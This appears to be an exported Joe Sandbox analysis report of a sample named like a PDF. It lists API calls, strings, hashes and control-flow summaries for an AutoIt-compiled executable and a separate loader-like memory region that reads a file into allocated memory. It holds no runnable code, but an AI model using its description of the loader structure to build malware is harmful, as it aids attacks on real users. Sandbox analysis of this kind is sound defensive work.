                                                                          • String ID: Variable must be of type 'Object'.
                                                                          • API String ID: 0-109567571
                                                                          • Opcode ID: 72317db6c8ddcbf61161d76f21f0f0f7fe529209cf0911ffa0c675a62496e784
                                                                          • Instruction ID: 53d50f793f3174bf7b967c3b8426f6e5abb8f532ec508a9969d6d79c94a3bfa4
                                                                          • Opcode Fuzzy Hash: 72317db6c8ddcbf61161d76f21f0f0f7fe529209cf0911ffa0c675a62496e784
                                                                          • Instruction Fuzzy Hash: 75A2A274A04255CFCB24CF5AC980AAEB7F1FF59300F2481A9E91AAB351D735ED42CB91
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF0BBB
                                                                          • timeGetTime.WINMM ref: 00AF0E76
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF0FB3
                                                                          • TranslateMessage.USER32(?), ref: 00AF0FC7
                                                                          • DispatchMessageW.USER32(?), ref: 00AF0FD5
                                                                          • Sleep.KERNEL32(0000000A), ref: 00AF0FDF
                                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00AF105A
                                                                          • DestroyWindow.USER32 ref: 00AF1066
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AF1080
                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00B252AD
                                                                          • TranslateMessage.USER32(?), ref: 00B2608A
                                                                          • DispatchMessageW.USER32(?), ref: 00B26098
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B260AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                          • API String ID: 4003667617-3242690629
                                                                          • Opcode ID: 2e9df0b02a3dee71f75baea696698afe0845960aaa8b4173533d02abd6648e27
                                                                          • Instruction ID: df7f69e498b230528fa117e4d8e3ae7d2e0e0196f804e5d788768c731ffc4230
                                                                          • Opcode Fuzzy Hash: 2e9df0b02a3dee71f75baea696698afe0845960aaa8b4173533d02abd6648e27
                                                                          • Instruction Fuzzy Hash: CAB2AC70608751DFD738DB24D885BAABBE5FF84304F14499DF58A872A2DB74E844CB82

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00B491E9: __time64.LIBCMT ref: 00B491F3
                                                                            • Part of subcall function 00AE5045: _fseek.LIBCMT ref: 00AE505D
                                                                          • __wsplitpath.LIBCMT ref: 00B494BE
                                                                            • Part of subcall function 00B0432E: __wsplitpath_helper.LIBCMT ref: 00B0436E
                                                                          • _wcscpy.LIBCMT ref: 00B494D1
                                                                          • _wcscat.LIBCMT ref: 00B494E4
                                                                          • __wsplitpath.LIBCMT ref: 00B49509
                                                                          • _wcscat.LIBCMT ref: 00B4951F
                                                                          • _wcscat.LIBCMT ref: 00B49532
                                                                            • Part of subcall function 00B4922F: _memmove.LIBCMT ref: 00B49268
                                                                            • Part of subcall function 00B4922F: _memmove.LIBCMT ref: 00B49277
                                                                          • _wcscmp.LIBCMT ref: 00B49479
                                                                            • Part of subcall function 00B499BE: _wcscmp.LIBCMT ref: 00B49AAE
                                                                            • Part of subcall function 00B499BE: _wcscmp.LIBCMT ref: 00B49AC1
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B496DC
                                                                          • _wcsncpy.LIBCMT ref: 00B4974F
                                                                          • DeleteFileW.KERNEL32(?,?), ref: 00B49785
                                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B4979B
                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B497AC
                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B497BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          • API String ID: 1500180987-0
                                                                          • Opcode ID: 0d43018240ca2c2f8964e5a9be40d54949300e53fd4a888287f8333de3ca6503
                                                                          • Instruction ID: 62a9b54801b8c6903e1b67dbfc32ca74416fd69295888e6527573d6eb83c3378
                                                                          • Opcode Fuzzy Hash: 0d43018240ca2c2f8964e5a9be40d54949300e53fd4a888287f8333de3ca6503
                                                                          • Instruction Fuzzy Hash: 9CC128B1D00229AEDF21DFA5CD85ADFBBBDEF44304F0040AAF609E6151DB709A849F65

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AE3074
                                                                          • RegisterClassExW.USER32(00000030), ref: 00AE309E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE30AF
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00AE30CC
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE30DC
                                                                          • LoadIconW.USER32(000000A9), ref: 00AE30F2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE3101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: a407fa877b9cc8cb200a1e0aad7c664c8e77afa0e236e8a9cfd0d7842575fbd2
                                                                          • Instruction ID: cb1639e5e73f78303296d3910f70fc6dc19f1fb34b3d34941bdc2596e04e5183
                                                                          • Opcode Fuzzy Hash: a407fa877b9cc8cb200a1e0aad7c664c8e77afa0e236e8a9cfd0d7842575fbd2
                                                                          • Instruction Fuzzy Hash: 0E3149B184430AAFDB40CFA4EC85AD9BBF4FB09310F14456AE590E72A0DBB94585CF90

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AE3074
                                                                          • RegisterClassExW.USER32(00000030), ref: 00AE309E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE30AF
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00AE30CC
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE30DC
                                                                          • LoadIconW.USER32(000000A9), ref: 00AE30F2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE3101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: b982f4324f2caab1612db1e7838ced15e89f07631f0bebbb7d6db0afb9a2241d
                                                                          • Instruction ID: 3fbe224ed6a060633ae53ed8ead6c64317253c115442da12921ea22679480b51
                                                                          • Opcode Fuzzy Hash: b982f4324f2caab1612db1e7838ced15e89f07631f0bebbb7d6db0afb9a2241d
                                                                          • Instruction Fuzzy Hash: FC21C5B1D01219AFDB00DFA4EC49BADBBF8FB09700F04412AF510A72A0DBB945448F91

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00AE4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BA62F8,?,00AE37C0,?), ref: 00AE4882
                                                                            • Part of subcall function 00B0074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AE72C5), ref: 00B00771
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AE7308
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B1ECF1
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B1ED32
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00B1ED70
                                                                          • _wcscat.LIBCMT ref: 00B1EDC9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                          • API String ID: 2673923337-2727554177
                                                                          • Opcode ID: e72e819f94f83b8e0114ba7b4a3fade7d81559912191edf36168850933139f4e
                                                                          • Instruction ID: 1ece123bc27126dc49425729f11dafb193e593ebb6359b7b8d3aa8ec86ea1fc5
                                                                          • Opcode Fuzzy Hash: e72e819f94f83b8e0114ba7b4a3fade7d81559912191edf36168850933139f4e
                                                                          • Instruction Fuzzy Hash: 89714A7254C3419EC314EF66EC86AABBBE8FF9A340F40446EF455871A1EF709948CB51

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AE3A62
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00AE3A71
                                                                          • LoadIconW.USER32(00000063), ref: 00AE3A88
                                                                          • LoadIconW.USER32(000000A4), ref: 00AE3A9A
                                                                          • LoadIconW.USER32(000000A2), ref: 00AE3AAC
                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AE3AD2
                                                                          • RegisterClassExW.USER32(?), ref: 00AE3B28
                                                                            • Part of subcall function 00AE3041: GetSysColorBrush.USER32(0000000F), ref: 00AE3074
                                                                            • Part of subcall function 00AE3041: RegisterClassExW.USER32(00000030), ref: 00AE309E
                                                                            • Part of subcall function 00AE3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE30AF
                                                                            • Part of subcall function 00AE3041: InitCommonControlsEx.COMCTL32(?), ref: 00AE30CC
                                                                            • Part of subcall function 00AE3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE30DC
                                                                            • Part of subcall function 00AE3041: LoadIconW.USER32(000000A9), ref: 00AE30F2
                                                                            • Part of subcall function 00AE3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE3101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: d03bb6e96dd0b6263990b0b1aa3c3ecb5ddafc3413375c427970c1acaeb269ab
                                                                          • Instruction ID: 45ef3f40d9bef6863bb1bd6355e4d42e79d3f418ab4ca6c217a5074082fb6701
                                                                          • Opcode Fuzzy Hash: d03bb6e96dd0b6263990b0b1aa3c3ecb5ddafc3413375c427970c1acaeb269ab
                                                                          • Instruction Fuzzy Hash: 06215EB1D00305AFEB149FA5EC0ABAD7BB4FB09711F040129F504A72E0DBBA59549F84

                                                                          Control-flow Graph

                                                                          [Control-flow graph not rendered in this export. It spans basic blocks ae3633-ae3681 through b1d3a9 and contains calls to DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus, plus internal subcalls to af11d0, af11f3, b42a16, ae44cb, ae3114, ae4531, ae45df, b3817e and ae43db.]
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00AE36D2
                                                                          • KillTimer.USER32(?,00000001), ref: 00AE36FC
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AE371F
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE372A
                                                                          • CreatePopupMenu.USER32 ref: 00AE373E
                                                                          • PostQuitMessage.USER32(00000000), ref: 00AE375F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 5b629f42794f22481a4afe42e524c653024220b83ea38ab7455d3b67028c417f
                                                                          • Instruction ID: cf9344fb3cf363c9be94581576fd880f438f07ce31ae81ae4b7cc24b8e451a18
                                                                          • Opcode Fuzzy Hash: 5b629f42794f22481a4afe42e524c653024220b83ea38ab7455d3b67028c417f
                                                                          • Instruction Fuzzy Hash: 4F412AF3204285BBDF149F75EC0EB7E37A8EB05300F180129F612872E1DEA59E509765

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                          • API String ID: 1825951767-3513169116
                                                                          • Opcode ID: a2b707991178b0cfb42939618454a3299b454492adacb7eb11bd2b2ea7e2975c
                                                                          • Instruction ID: 5b101cd57a193264afaab47536d287f5ec973032bdbbe4806a2798c24748d7ed
                                                                          • Opcode Fuzzy Hash: a2b707991178b0cfb42939618454a3299b454492adacb7eb11bd2b2ea7e2975c
                                                                          • Instruction Fuzzy Hash: 3BA151B2C102699ACF04EFA6DD95EEEB7B8BF14300F440569F416B7191EF745A09CB60

                                                                          Control-flow Graph

                                                                          [Control-flow graph not rendered in this export. It spans basic blocks 1c525b0-1c5265e through 1c528aa-1c528b2 and contains calls to CreateFileW, VirtualAlloc (twice), ReadFile, VirtualFree (twice) and CloseHandle, plus internal subcalls to 1c50000, 1c534c0, 1c53710 and 1c53520.]
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01C52681
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01C528A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                          • Instruction ID: 10c264ce49a2ea77150062ab73cf8ac45a96c267d0d58ada124ca1fe9ad5c6b9
                                                                          • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                          • Instruction Fuzzy Hash: 2EA10875E00209EBDB54CFE4C894BEEBBB5FF48304F208559E901BB281D7759A80CB98

                                                                          Control-flow Graph

                                                                          [Control-flow graph not rendered in this export. It consists of the single basic block ae39e7-ae3a57, which calls CreateWindowExW twice and ShowWindow twice.]
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AE3A15
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AE3A36
                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00AE3A4A
                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00AE3A53
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: 070fb7670884fcf7f909935987cf392759704de4df585b88d7daa2be79ac23f4
                                                                          • Instruction ID: 7ea3b6dd881b4355be674c34c0ee8e554147336f83d2310a5cbe1ffa0ec606e4
                                                                          • Opcode Fuzzy Hash: 070fb7670884fcf7f909935987cf392759704de4df585b88d7daa2be79ac23f4
                                                                          • Instruction Fuzzy Hash: BAF0DAB16413907EEA315B677C4AF772F7DE7C7F50B04412AB904E31B0CAA91851DAB0

                                                                          Control-flow Graph

                                                                          control_flow_graph 1074 1c523b0-1c524b0 call 1c50000 call 1c522a0 CreateFileW 1081 1c524b7-1c524c7 1074->1081 1082 1c524b2 1074->1082 1085 1c524ce-1c524e8 VirtualAlloc 1081->1085 1086 1c524c9 1081->1086 1083 1c52567-1c5256c 1082->1083 1087 1c524ec-1c52503 ReadFile 1085->1087 1088 1c524ea 1085->1088 1086->1083 1089 1c52505 1087->1089 1090 1c52507-1c52541 call 1c522e0 call 1c512a0 1087->1090 1088->1083 1089->1083 1095 1c52543-1c52558 call 1c52330 1090->1095 1096 1c5255d-1c52565 ExitProcess 1090->1096 1095->1096 1096->1083
                                                                          APIs
                                                                            • Part of subcall function 01C522A0: Sleep.KERNELBASE(000001F4), ref: 01C522B1
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01C524A6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileSleep
                                                                          • String ID: QHJA9R028E2C
                                                                          • API String ID: 2694422964-1086926646
                                                                          • Opcode ID: d57726b4d6be3cfe792c6ed16bd0e7795b6e9238aa06d940f4bcbccd0ca31352
                                                                          • Instruction ID: 6d4172e6c0e806a12afd7dc31bc4d76357eb0dfe1346bfff1a693093f9b6bbd2
                                                                          • Opcode Fuzzy Hash: d57726b4d6be3cfe792c6ed16bd0e7795b6e9238aa06d940f4bcbccd0ca31352
                                                                          • Instruction Fuzzy Hash: B1516371D14209DBEF11DBE4C814BEEBBB8AF54300F004199E609BB2C0D7755B85CBA5

                                                                          Control-flow Graph

                                                                          control_flow_graph 1098 ae410d-ae4123 1099 ae4129-ae413e call ae7b76 1098->1099 1100 ae4200-ae4204 1098->1100 1103 ae4144-ae4164 call ae7d2c 1099->1103 1104 b1d5dd-b1d5ec LoadStringW 1099->1104 1106 b1d5f7-b1d60f call ae7c8e call ae7143 1103->1106 1108 ae416a-ae416e 1103->1108 1104->1106 1116 ae417e-ae41fb call b03020 call ae463e call b02ffc Shell_NotifyIconW call ae5a64 1106->1116 1120 b1d615-b1d633 call ae7e0b call ae7143 call ae7e0b 1106->1120 1110 ae4174-ae4179 call ae7c8e 1108->1110 1111 ae4205-ae420e call ae81a7 1108->1111 1110->1116 1111->1116 1116->1100 1120->1116
                                                                          APIs
                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B1D5EC
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          • _memset.LIBCMT ref: 00AE418D
                                                                          • _wcscpy.LIBCMT ref: 00AE41E1
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AE41F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                          • String ID: Line:
                                                                          • API String ID: 3942752672-1585850449
                                                                          • Opcode ID: 76d17735bac7e1430378d4dbc39c9f26707f8fef7b74483b116e0f901b88ec2d
                                                                          • Instruction ID: 31dc9c11c0470bcf4bb9e9f45b157daf92640aee04aaa00483feed44b331dbeb
                                                                          • Opcode Fuzzy Hash: 76d17735bac7e1430378d4dbc39c9f26707f8fef7b74483b116e0f901b88ec2d
                                                                          • Instruction Fuzzy Hash: 1B31E0B1008385AAD721EB61DD46FEF77ECAF59300F14461EF185930A1EF74AA48CB92

                                                                          Control-flow Graph

